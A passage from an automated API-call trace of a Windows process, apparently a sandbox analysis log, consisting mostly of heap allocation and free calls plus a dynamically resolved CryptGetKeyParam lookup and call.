hHeap=0x8a0000) returned 1 [0173.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0173.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0173.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0173.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0173.621] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0173.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0173.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0173.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0173.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0173.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0173.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0173.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0173.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.622] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0173.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0173.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdac8 [0173.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0173.622] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0173.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0173.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0173.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0173.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0173.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0173.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0173.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0173.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0173.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0173.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0173.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0173.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0173.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0173.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0173.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0173.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0173.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0173.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0173.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0173.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0173.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0173.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0173.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0173.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0173.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0173.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0173.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0173.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0173.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0173.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0173.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0173.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0173.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0173.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0173.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0173.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0173.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0173.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0173.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0173.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0173.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0173.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0173.625] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0173.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0173.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0173.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0173.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.626] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0173.627] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c28d8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c28d8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.628] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.628] 